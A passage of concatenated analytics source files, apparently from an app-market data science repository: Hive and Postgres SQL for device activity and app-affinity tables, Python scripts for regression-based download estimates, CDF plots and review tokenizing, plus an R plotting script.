active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
drop table if exists period_active_monthly;
create table period_active_monthly (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-monthly'
;
insert overwrite table period_active_monthly
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_monthly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = day(active.datestr)
) x
;
-- Get unique iOS devices
drop table if exists ios_devices;
create table ios_devices
as
select
device_id
from
vpn_new_device_info_us
where
platform = 'iOS'
and (type = 'Tablet' or type = 'Smartphone')
group by
device_id
;
--
drop table if exists app_sessions_per_device;
create table app_sessions_per_device
as
select
session.datestr,
session.device_id,
session.bundleid,
max(session.end_period_date) as weekly_end_period_date
from
(
select
to_date(from_utc_timestamp(s.starttime, 'America/Los_Angeles')) AS datestr,
s.device_id,
s.bundleid,
w.datestr as end_period_date
from
usage_model_selected_device_timezone_weekly w
join ios_devices device
on w.device_id = device.device_id
join vpn_sample_data_session_us s
on w.device_id = s.device_id
and s.country = 'US'
where
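            -- Keep sessions longer than 1000 (presumably milliseconds), plus a
            -- few whitelisted bundle ids that are kept regardless of duration.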
(
(
(endtime - starttime > 1000)
or bundleid in (
'com.google.Translate',
'com.sgn.cookiejam',
'com.bitrhymes.bingo2',
'com.weplaydots.twodots')
)
)
-- Only use sessions on active days.
and w.date = to_date(from_utc_timestamp(s.starttime, 'America/Los_Angeles'))
-- and s.datestr between '2015-03-25' and '2015-04-06'
-- limit 3
) as session
group by
session.datestr,
session.device_id,
session.bundleid
;
-- Used apps per device and week
drop table if exists sessions_per_device_weekly;
create table sessions_per_device_weekly(
end_date string,
device_id string,
bundleid string)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/bundles_devices_weekly'
;
insert overwrite table sessions_per_device_weekly
select
session.weekly_end_period_date as end_date,
session.device_id,
session.bundleid
from
period_active_weekly weekly
join app_sessions_per_device session
on weekly.end_period_date = session.weekly_end_period_date
and weekly.device_id = session.device_id
group by
session.weekly_end_period_date,
session.device_id,
session.bundleid
;
-- Used apps per device and month
drop table if exists sessions_per_device_monthly;
create table sessions_per_device_monthly(
end_date string,
device_id string,
bundleid string)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/bundles_devices_monthly'
;
insert overwrite table sessions_per_device_monthly
select
max(session.datestr) as end_date,
session.device_id,
session.bundleid
from
period_active_monthly monthly
join usage_model_selected_device_timezone_monthly active
on monthly.device_id = active.device_id
and monthly.end_period_date = active.datestr
join app_sessions_per_device session
on active.date = session.datestr
and active.device_id = session.device_id
group by
year(session.datestr),
month(session.datestr),
session.device_id,
session.bundleid
;
<file_sep>/google-analytics/rincon_dump/Libraries/CDF.py
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
def plot_cdfs(abs_error_values_array, name=('Default',), title='', xlabel=''):
    # `name` must be a sequence of labels, one per error series.
for index, abs_error_values in enumerate(abs_error_values_array):
if name[index] == 'Flat Model':
line_style = '--'
else:
line_style = '-'
count, bins = np.histogram(abs_error_values, bins=np.arange(0,100))
total_count = float(abs_error_values.dropna().shape[0])
plt.plot(bins[1:], 100*np.cumsum(count) / total_count, line_style, label=name[index])
ax = plt.gca()
ax.set_xlabel(xlabel)
ax.set_ylabel('% of Apps')
ax.set_title(title)
return ax
def calculate_and_plot_cdf(data, y_truth_col, y_cols, name='default', title='', xlabel=''):
abs_error_array = []
for y_col in y_cols:
abs_error_array.append(100.0 * np.abs(data[y_col] - data[y_truth_col]) / data[y_truth_col])
return plot_cdfs(abs_error_array, name=y_cols, title=title, xlabel=xlabel)
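# Usage sketch (hypothetical DataFrame/column names):
#   ax = calculate_and_plot_cdf(df, 'actual', ['estimate_a', 'estimate_b'],
#                               title='Error CDF', xlabel='Absolute % Error')
#   plt.legend(loc='best')
#   plt.show()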
<file_sep>/sbe_benchmark/model_pv41.py
##
# KPI_analysis_ios_nonnuniv version 3
# Department: Data Science
# Author: <NAME>
# Created: Sept 26, 2013
# Description: Simulates the SBE solution on the Debug data set.
# Also includes the SBE error comparison with auto-segmented SBE.
##
import pandas as pd
#import os
import config
#import operator
import math
import csv
#import statsmodels.formula.api as sm
import statsmodels.regression.linear_model as sm
from sklearn.svm import SVR
import numpy as np
#from rpy import *
import matplotlib.pyplot as plt
import datetime as dt
from sklearn.cross_validation import KFold
result = None
gres = []
feed_market_format = { 0: 'Free',
1: 'Paid',
2: 'Grossing',
}
def fun(x):
if np.isnan(x):
return 0
else:
return 1/pow(float(x),2 )
def preprocess_metadata(df):
df['iphone_estimate'] = df['iphone_estimate'].fillna(0)
df['ipad_estimate'] = df['ipad_estimate'].fillna(0)
df['actual_log']=np.log(df['actual'])
df['Daily.Estimate']=df['iphone_estimate'] + df['ipad_estimate']
df['r1_log']=np.log(df['iphone_rank'])
df['r2_log']=np.log(df['ipad_rank'])
df['r1_inv']=1.0/df['iphone_rank']
df['r2_inv']=1.0/df['ipad_rank']
df['weekday'] = df['date'].apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%d').weekday())
df['isMon'] = 0
df['isTue'] = 0
df['isWed'] = 0
df['isThu'] = 0
df['isFri'] = 0
df['isSat'] = 0
df['isSun'] = 0
df['isMon'][(df['weekday'] == 0)] = 1
df['isTue'][(df['weekday'] == 1)] = 1
df['isWed'][(df['weekday'] == 2)] = 1
df['isThu'][(df['weekday'] == 3)] = 1
df['isFri'][(df['weekday'] == 4)] = 1
df['isSat'][(df['weekday'] == 5)] = 1
df['isSun'][(df['weekday'] == 6)] = 1
df['wt_rank_iphone'] = 1.0/df['iphone_rank']**2
df['wt_rank_ipad'] = 1.0/df['ipad_rank'] ** 2
df['wt_rank_iphone'] = df['wt_rank_iphone'].fillna(0)
df['wt_rank_ipad'] = df['wt_rank_ipad'].fillna(0)
df['wt_rank'] = df['wt_rank_iphone'] + df['wt_rank_ipad']
df['wt_perc'] = 1.0 / df['actual']
del df['wt_rank_iphone']
del df['wt_rank_ipad']
df = df.drop_duplicates()
return df
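# NB: @profile is injected by kernprof (line_profiler) or memory_profiler;
# remove or stub it out to run this script without a profiler.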
@profile
def main():
global result
global gres
global store_id
data_dir = '/Users/perezrafael/appannie/data/benchmark_antony'
#data_file = 'benchmark_data_143513.csv'
data_file = 'benchmark_data_143444.csv'
metadata_f = '%s/%s'%(data_dir, data_file)
sdf = pd.read_csv(metadata_f)
store_id = data_file.split('_')[2][:6]
df = preprocess_metadata(sdf)
print store_id
#df.to_csv('data_temp.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
#columns = df.columns
startdate = '2013-07-21'
enddate = '2013-07-27'
for n, g in df.groupby(['category_id', 'feed_id']):
dates = g['date'].drop_duplicates()
for date in dates:
if (date > enddate) or (date < startdate):
continue
print n, date
df_obs = g[(g['date'] <= date) & (g['date'] >= (dt.datetime.strptime(date, '%Y-%m-%d').date() - dt.timedelta(days=7)).isoformat() )]
df_obs = df_obs.reset_index()
kf = KFold(len(df_obs), n_folds=5, indices=True, shuffle=True)
print('iphone_only')
test_out1 = []
try:
model_ra1 = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == False) & (np.isnan(df_obs['r2_log']) == True) & (np.isnan(df_obs['actual']) == False)))
fitted_ra1 = model_ra1.fit()
for tr, te in kf:
train = df_obs.loc[tr]
test = df_obs.loc[te]
test1 = test.dropna(subset = ['r1_log'])
test1 = test1[test1['date'] == date]
try:
model_r1 = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == False) & (np.isnan(train['r2_log']) == True) & (np.isnan(train['actual']) == False)))
fitted_r1 = model_r1.fit()
test1['t1e'] = np.exp(fitted_r1.predict(test1[['r1_log', 'r1_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
test1['t1e'] = np.exp(fitted_ra1.predict(test1[['r1_log', 'r1_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_out1.append(test1)
test_out1 = pd.concat(test_out1)
except:
test_out1 = df_obs[df_obs['date'] == date]
test_out1['t1e'] = None
pass
print('ipad_only')
test_out2 = []
try:
model_ra2 = sm.OLS.from_formula(formula ='actual_log ~ r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == True) & (np.isnan(df_obs['r2_log']) == False) & (np.isnan(df_obs['actual']) == False)))
fitted_ra2 = model_ra2.fit()
for tr, te in kf:
train = df_obs.loc[tr]
test = df_obs.loc[te]
test2 = test.dropna(subset = ['r2_log'])
test2 = test2[test2['date'] == date]
try:
model_r2 = sm.OLS.from_formula(formula ='actual_log ~ r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == True) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual']) == False)))
fitted_r2 = model_r2.fit()
test2['t2e'] = np.exp(fitted_r2.predict(test2[['r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
test2['t2e'] = np.exp(fitted_ra2.predict(test2[['r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_out2.append(test2)
test_out2 = pd.concat(test_out2)
except:
test_out2 = df_obs[df_obs['date'] == date]
test_out2['t2e'] = None
pass
print('universal')
test_outa = []
try:
model_raa = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == False) & (np.isnan(df_obs['r2_log']) == False) & (np.isnan(df_obs['actual']) == False)))
fitted_raa = model_raa.fit()
for tr, te in kf:
train = df_obs.loc[tr]
test = df_obs.loc[te]
testa = test.dropna(subset = ['r2_log', 'r1_log'])
testa = testa[testa['date'] == date]
try:
model_ra = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == True) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual']) == False)))
fitted_ra = model_ra.fit()
testa['tae'] = np.exp(fitted_ra.predict(testa[['r1_log', 'r1_inv', 'r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
testa['tae'] = np.exp(fitted_raa.predict(testa[['r1_log', 'r1_inv', 'r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_outa.append(testa)
test_outa = pd.concat(test_outa)
test_outa = test_outa[test_outa['date'] == date]
except:
test_outa = df_obs[df_obs['date'] == date]
test_outa['tae'] = None
pass
#print test_out1.columns
test_out1 = test_out1[['app_id', 'category_id', 'date', 'feed_id', 't1e']]
test_out2 = test_out2[['app_id', 'category_id', 'date', 'feed_id', 't2e']]
test_outa = test_outa[['app_id', 'category_id', 'date', 'feed_id', 'tae']]
result = df_obs.merge(test_out1, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
result = result.merge(test_out2, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
result = result.merge(test_outa, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
gres.append(result)
gres = pd.concat(gres)
#gres.to_csv('data_temp1.csv', index=False, quoting = csv.QUOTE_NONNUMERIC)
gres_final = gres.groupby(['store_id', 'date', 'app_id']).mean().reset_index()
print gres_final.columns
gres_final['t1e'] = gres_final['t1e'].fillna(0)
gres_final['t2e'] = gres_final['t2e'].fillna(0)
gres_final['t1e+t2e'] = gres_final['t1e'] + gres_final['t2e']
gres_final['sbe_rel_error'] = (gres_final['iphone_estimate'] + gres_final['ipad_estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['t12e_rel_error'] = (gres_final['t1e+t2e'] - gres_final['actual']).abs()*1.0/gres_final['actual']
#gres_final.insert(0, 'key', gres_final['Day'].apply(lambda x: str()) + "_" + gres_final['App.ID'].apply(lambda x: str() ))
gres_final.to_csv('/Users/antony/workspace/data_science/sbe_benchmark/res_%s_v7.csv'%store_id,index=False, quoting = csv.QUOTE_NONNUMERIC)
if False:
gres = gres.merge(gres_final, on=['Store', 'Day', 'App.ID'], how='left')
gres = gres[gres['Category_x'] ==36]
#gres_iphone = gres[(gres['Rank_x_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['new_rel_error'] < 5)]
gres_iphone = gres[(gres['Rank_x_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['t12e_rel_error'] < 5)]
gres_iphone = gres_iphone.sort('Rank_x_x', ascending=True)
for n, g in gres_iphone.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_x_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
            ax.scatter(g['Rank_x_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmented SBE')
ax.legend(loc='best')
title = 'Relative Error iPhone Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 1000)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
gres_ipad = gres[(gres['Rank_y_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['t12e_rel_error'] < 5)]
gres_ipad = gres_ipad.sort('Rank_y_x', ascending=True)
for n, g in gres_ipad.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_y_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
            ax.scatter(g['Rank_y_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmented SBE')
ax.legend(loc='best')
title = 'Relative Error iPad Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 400)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
# the following code build the 80-20 curve
if False:
for n, g in gres_final.groupby(['feed_id']):
fig = plt.figure()
g = g.sort('actual', ascending=False)
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('t12e_rel_error', ascending=True)
p1, = ax.plot(g['t12e_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv Univ')
ax.legend(loc=4)
if (n == 0):
title = '80-20 %s Free All Apps'%store_id
if (n == 1):
title = '80-20 %s Paid All Apps'%store_id
if (n == 2):
title = '80-20 %s Grossing All Apps'%store_id
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
#fig.savefig('%s.png'%title)
fig.savefig('LogInv_NB_Plots/%s.png'%title)
plt.close()
fig = plt.figure()
g = g.sort('actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('t12e_rel_error', ascending=True)
p1, = ax.plot(g['t12e_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv Univ')
ax.legend(loc=4)
if (n == 0):
title = '80-20 %s Free Top200 Apps'%store_id
if (n == 1):
title = '80-20 %s Paid Top200 Apps'%store_id
if (n == 2):
title = '80-20 %s Grossing Top200 Apps'%store_id
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
#fig.savefig('%s.png'%title)
fig.savefig('LogInv_NB_Plots/%s.png'%title)
# the following code build the Actual-Error curve
if False:
for n, g in gres_final.groupby(['feed_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(g['actual'], g['actual'], color='black', label='Actual')
ax.plot(g['actual'], (g['Daily.Estimate']), 'r.', alpha=0.4, label='SBE')
ax.plot(g['actual'], (g['tae']), 'b.', alpha=0.4, label='LogInv Univ')
ax.legend(loc='best')
title = 'ActEst %s %s July%s'%(store_id, str(int(float(n[0]))), str(int(float(n[1]))) )
plt.title(title)
plt.ylabel('Estimates')
plt.xlabel('Actual')
plt.grid()
ax.set_yscale('log')
ax.set_xscale('log')
#fig.savefig('%s.png'%title)
fig.savefig('LogInv_Plots/%s.png'%title)
print title
#plt.close()
print('Done')
pass
if __name__ == '__main__':
main()<file_sep>/icon-matching-framework/lib/queries.py
from config import DISTIMO_MATCHES_TABLE, DISTIMO_MATCHED_APPLICATIONS_TABLE
distimo_queries = {
'matches': """
select
from_appstore_id as from_market,
from_application_id as from_app_id,
to_appstore_id as to_market,
to_application_id as to_app_id
from
{matches_table}
""".format(matches_table=DISTIMO_MATCHES_TABLE),
'app_info': """
select
ma.appstore_id as market,
ma.application_id as app_id,
a.name,
a.publisher
from
{matched_applications_table} ma
join appstore.applications a
on ma.application_id = a.id
where
ma.appstore_id = 1
union all
select
ma.appstore_id as market,
ma.application_id as app_id,
a.name,
a.publisher
from
{matched_applications_table} ma
join market.applications a
on ma.application_id = a.id
where
ma.appstore_id = 2
union all
select
ma.appstore_id as market,
ma.application_id as app_id,
a.name,
a.publisher
from
{matched_applications_table} ma
join amazon.applications a
on ma.application_id = a.id
where
ma.appstore_id = 10
""".format(matched_applications_table=DISTIMO_MATCHED_APPLICATIONS_TABLE),
'matched_app_query': """
select
appstore_id as market,
application_id as app_id,
icon_url
from
{matched_applications_table}
""".format(matched_applications_table=DISTIMO_MATCHED_APPLICATIONS_TABLE)
}
app_annie_queries = {
'matches': """
with
gp_matches as (
select
*
from
dna_universal_app_mapping
where
market = 'gp'),
ios_matches as (
select
*
from
dna_universal_app_mapping
where
market = 'ios')
select
gp.app_id as from_app_id,
gp.market as from_market,
ios.app_id as to_app_id,
ios.market as to_market
from
gp_matches gp
join ios_matches ios
using(universal_app_id)
;
""",
'dblink_aa_to_aa_android': """
select
dblink_connect('aa_link',
'dbname=aa host={host} user={user} password={password}');
""",
'app_info_android': """
select
am.market,
am.app_id,
app.name,
app.company
from
dblink('aa_link',
'
select
universal_app_id,
app_id,
market
from
dna_universal_app_mapping
where
market = $$gp$$
') as am(universal_app_id bigint, app_id bigint, market varchar)
inner join app
on am.app_id = app.id
;
""",
'app_info_ios': """
select
am.market,
am.app_id,
app.name as name,
app.company as company
from
dna_universal_app_mapping am
join aa_app app
on am.app_id = app.id
where
am.market = 'ios'
;
""",
'matched_app_android': """
select
am.market,
am.universal_app_id,
am.app_id,
app.name,
app.company,
app.icon_url
from
dblink('aa_link',
'
select
universal_app_id,
app_id,
market
from
dna_universal_app_mapping
where
market = $$gp$$
') as am(universal_app_id bigint, app_id bigint, market varchar)
inner join app
on am.app_id = app.id
;
""",
'matched_app_ios': """
select
am.market,
am.universal_app_id,
am.app_id,
app.name as name,
app.company as company,
app.artwork_url as icon_url
from
dna_universal_app_mapping am
join aa_app app
on am.app_id = app.id
where
am.market = 'ios'
;
"""
}<file_sep>/old_investigations/plot_improvement.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
max_day = max(df$both_real_estimate_num, na.rm=TRUE)
# Select only when we have max days
sub_df= subset(df, (both_real_estimate_num == max_day))
print("Shape beforing selecting.")
print(dim(df))
print("Shape after selecting.")
print(dim(sub_df))
df = sub_df
# Calculate relative error and improvement.
df$CBE.Relative.Error = abs(df$Current.Best.Estimation - df$units_avg) / df$units_avg
df$SDA.Relative.Error = abs(df$estimate_avg- df$units_avg) / df$units_avg
df$SDA.Improvement = df$CBE.Relative.Error - df$SDA.Relative.Error
f <- paste('plots/',
paste(metainfo$country, metainfo$period, 'improvement.png', sep='_'), sep='')
png(file=f, width=1300, height=1700)
plot_improvement(df, metainfo, "CBE")
dev.off()
<file_sep>/audience/demographics-review/lib/text_processing.py
import nltk
import re
import string
from constants import contractions
from guess_language import guess_language
from nltk.tokenize import RegexpTokenizer
sentence_detector = nltk.data.load('tokenizers/punkt/english.pickle')
text_tokenizer = RegexpTokenizer("[a-zA-Z']+|[^\w\s]{2,}|[\d]+|[\d\-\+]{2,}")
def replace_contractions(x):
for k,v in contractions.iteritems():
x = x.replace(k, v)
return x
def guess_lang(text):
try:
return guess_language(text.decode('utf-8'))
except:
        return 'UNKNOWN'
def tokenize_text(text_str, ex_word_set, pattern, control):
MIN_N = 1
MAX_N = 3
text_str = text_str.lower()
text_str = replace_contractions(text_str)
text_str = text_str.replace(',', '.')
text_str = ''.join([c for c in text_str if c in control])
text_str = pattern.sub(' ', text_str)
text_sentences = sentence_detector.tokenize(text_str)
n_grams = []
for sentence in text_sentences:
sentence_tokens = text_tokenizer.tokenize(sentence)
sentence_tokens = [w for w in sentence_tokens if len(w)>1]
sentence_tokens = [w for w in sentence_tokens if not w in ex_word_set]
n_tokens = len(sentence_tokens)
for i in xrange(n_tokens):
for j in xrange(i+MIN_N, min(n_tokens, i+MAX_N)+1):
n = sentence_tokens[i:j]
#n = [re.sub(r'[^\s](.)\1\1\1+ ', r' \1\1\1 ',w) for w in n]
n_grams.append(' '.join(n))
n_grams = list(set(n_grams))
return n_grams
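# Usage sketch (hypothetical arguments): `ex_word_set` is a set of stopwords
# to drop, `pattern` is a compiled regex whose matches are blanked out, and
# `control` is the set of characters to keep.
#   pattern = re.compile(r'\d+')
#   control = set(string.printable)
#   grams = tokenize_text('I love this app!', set(['the']), pattern, control)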
def tokenize_chain(review_chain, ex_word_set, pattern, control):
p = re.compile(r'<>')
review_chain = p.split(review_chain)
text_t = []
for i, val in enumerate(review_chain):
text_t = text_t + tokenize_text(val, ex_word_set, pattern, control)
return set(text_t)
<file_sep>/audience/related_apps/create_affinity.sql
\set StartDate '2013-07-01'
\set EndDate '2014-07-01'
---------build table aff_app_reviewer_ct
DROP TABLE IF EXISTS aff_app_reviewer_ct CASCADE;
CREATE TABLE aff_app_reviewer_ct AS
(SELECT store_id,
app_id,
Count(DISTINCT reviewer) AS reviewer_ct
FROM aa_review
WHERE reviewer != ''
AND date >= :StartDate
AND date < :EndDate
GROUP BY store_id,
app_id);
CREATE INDEX aff_app_reviewer_ct_app_id1
ON aff_app_reviewer_ct (app_id);
CREATE INDEX aff_app_reviewer_ct_store_id1
ON aff_app_reviewer_ct (store_id);
CREATE INDEX aff_app_reviewer_ct_app_id_store_id1
ON aff_app_reviewer_ct (app_id, store_id);
---------build table aff_app_reviewer_joint_ct
DROP TABLE IF EXISTS aff_app_reviewer_joint_ct CASCADE;
CREATE TABLE aff_app_reviewer_joint_ct AS
(SELECT
r1.store_id AS store_id,
r1.app_id AS app1_id,
r2.app_id AS app2_id,
Count(DISTINCT r1.reviewer) AS joint_reviewer_ct
FROM aa_review r1,
aa_review r2
WHERE r1.reviewer = r2.reviewer
AND r1.store_id = r2.store_id
AND r1.reviewer != ''
AND r1.app_id != r2.app_id
AND r1.date >= :StartDate
AND r1.date < :EndDate
AND r2.date >= :StartDate
AND r2.date < :EndDate
GROUP BY r1.store_id,
r1.app_id,
r2.app_id);
CREATE INDEX aff_app_reviewer_joint_ct_app1_id1
ON aff_app_reviewer_joint_ct (app1_id);
CREATE INDEX aff_app_reviewer_joint_ct_app2_id1
ON aff_app_reviewer_joint_ct (app2_id);
CREATE INDEX aff_app_reviewer_joint_ct_store_id_app1_id_app2_id1
ON aff_app_reviewer_joint_ct (store_id, app1_id, app2_id);
CREATE INDEX aff_app_reviewer_joint_ct_app1_id_app2_id1
ON aff_app_reviewer_joint_ct ( app1_id, app2_id);
CREATE INDEX aff_app_reviewer_joint_ct_store_id_app1_id1
ON aff_app_reviewer_joint_ct (store_id, app1_id);
CREATE INDEX aff_app_reviewer_joint_ct_store_id_app2_id1
ON aff_app_reviewer_joint_ct (store_id, app2_id);
CREATE INDEX aff_app_reviewer_joint_ct_store_id1
ON aff_app_reviewer_joint_ct (store_id);
---------build table aff_results_all
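-- jaccard_index = joint / (ct1 + ct2 - joint): overlap of the two apps'
-- reviewer sets; companion_index = joint / ct2: the share of app2's
-- reviewers who also reviewed app1.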
DROP TABLE IF EXISTS aff_results_all CASCADE;
CREATE TABLE aff_results_all AS
(SELECT jrc.store_id,
jrc.app1_id,
rc1.reviewer_ct AS app1_reviewer_ct,
jrc.app2_id,
rc2.reviewer_ct AS app2_reviewer_ct,
jrc.joint_reviewer_ct AS joint_reviewer_ct,
CAST(jrc.joint_reviewer_ct AS FLOAT) / CAST((
rc1.reviewer_ct + rc2.reviewer_ct - jrc.joint_reviewer_ct ) AS FLOAT)
AS jaccard_index,
CAST(jrc.joint_reviewer_ct AS FLOAT) / CAST(rc2.reviewer_ct AS FLOAT)
AS companion_index
FROM aff_app_reviewer_ct rc1,
aff_app_reviewer_ct rc2,
aff_app_reviewer_joint_ct jrc
WHERE rc1.store_id = jrc.store_id
AND rc2.store_id = jrc.store_id
AND rc1.app_id = jrc.app1_id
AND rc2.app_id = jrc.app2_id
AND rc1.app_id > 10000
AND rc2.app_id > 10000);
CREATE INDEX aff_results_all_store_id1
ON aff_results_all (store_id);
CREATE INDEX aff_results_all_app1_id1
ON aff_results_all (app1_id);
CREATE INDEX aff_results_all_app2_id1
ON aff_results_all (app2_id);
CREATE INDEX aff_results_all_store_id_app1_id1
ON aff_results_all (store_id, app1_id);
CREATE INDEX aff_results_all_store_id_app2_id1
ON aff_results_all (store_id, app2_id);
CREATE INDEX aff_results_all_store_id_app1_id_app2_id1
ON aff_results_all (store_id, app1_id, app2_id);
CREATE INDEX aff_results_all_app1_id1_app2_id1
ON aff_results_all (app1_id, app2_id);
---------SELECT TOP Affinity-------
DROP TABLE IF EXISTS aff_results_top_affinity CASCADE;
SELECT s.app1_id,
a.name AS app1_name,
s.app1_reviewer_ct,
s.app2_id,
b.name AS app2_name,
s.app2_reviewer_ct,
s.joint_reviewer_ct,
s.jaccard_index,
s.rank
INTO aff_results_top_affinity
FROM (SELECT app1_id,
app1_reviewer_ct,
app2_id,
app2_reviewer_ct,
joint_reviewer_ct,
jaccard_index,
Row_number()
OVER (
partition BY app1_id
ORDER BY jaccard_index DESC, app2_id ASC) AS RANK
FROM aff_results_all
WHERE store_id = 143441
AND app1_reviewer_ct >= 100
AND joint_reviewer_ct >= 10) s
LEFT JOIN aa_app a
ON s.app1_id = a.id
LEFT JOIN aa_app b
ON s.app2_id = b.id
WHERE rank <= 20;
---------SELECT TOP Companion -------
DROP TABLE IF EXISTS aff_results_top_companion CASCADE;
SELECT s.app1_id,
a.name AS app1_name,
s.app1_reviewer_ct,
s.app2_id,
b.name AS app2_name,
s.app2_reviewer_ct,
s.joint_reviewer_ct,
s.companion_index,
s.rank
INTO aff_results_top_companion
FROM (SELECT app1_id,
app1_reviewer_ct,
app2_id,
app2_reviewer_ct,
joint_reviewer_ct,
companion_index,
Row_number()
OVER (
partition BY app1_id
ORDER BY companion_index DESC, app2_id ASC) AS RANK
FROM aff_results_all
WHERE store_id = 143441
AND app1_reviewer_ct >= 100
AND joint_reviewer_ct >= 10) s
LEFT JOIN aa_app a
ON s.app1_id = a.id
LEFT JOIN aa_app b
ON s.app2_id = b.id
WHERE rank <= 20;
<file_sep>/sbe_benchmark/find_category_scores.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
import config
DATA_DIR = '/Users/perezrafael/appannie/data/loginv_results'
def plot_estimates(df):
for n, g in df.groupby(['store_id', 'feed_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(g['actual'], (g['scored_sbe_estimate']), 'ro', alpha=0.4, label='scored sbe')
ax.plot(g['actual'], (g['loginv_scored_sbe_estimate']), 'bo', alpha=0.4, label='loginv scored sbe')
ax.plot(g['actual'], (g['sbe_estimate']), 'r.', alpha=0.4, label='sbe')
ax.plot(g['actual'], (g['loginv_sbe_estimate']), 'b.', alpha=0.4, label='loginv sbe')
ax.plot(g['actual'], g['actual'], 'k-', label='actual')
ax.legend(loc='best')
title = 'ActEst %s'%str(n)
plt.title(title)
plt.ylabel('Estimates')
plt.xlabel('Actual')
plt.ylim(0, plt.xlim()[1])
plt.grid()
ax.set_yscale('log')
ax.set_xscale('log')
fig.savefig('data/loginv_plots/%s.png'%title)
plt.close()
def plot_8020(df, top='All'):
df = df.dropna(subset=['actual', 'loginv_sbe_rel_error', 'loginv_scored_sbe_rel_error'])
for n, g in df.groupby(['store_id', 'feed_id', 'category_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
g = g.sort('actual', ascending=False)
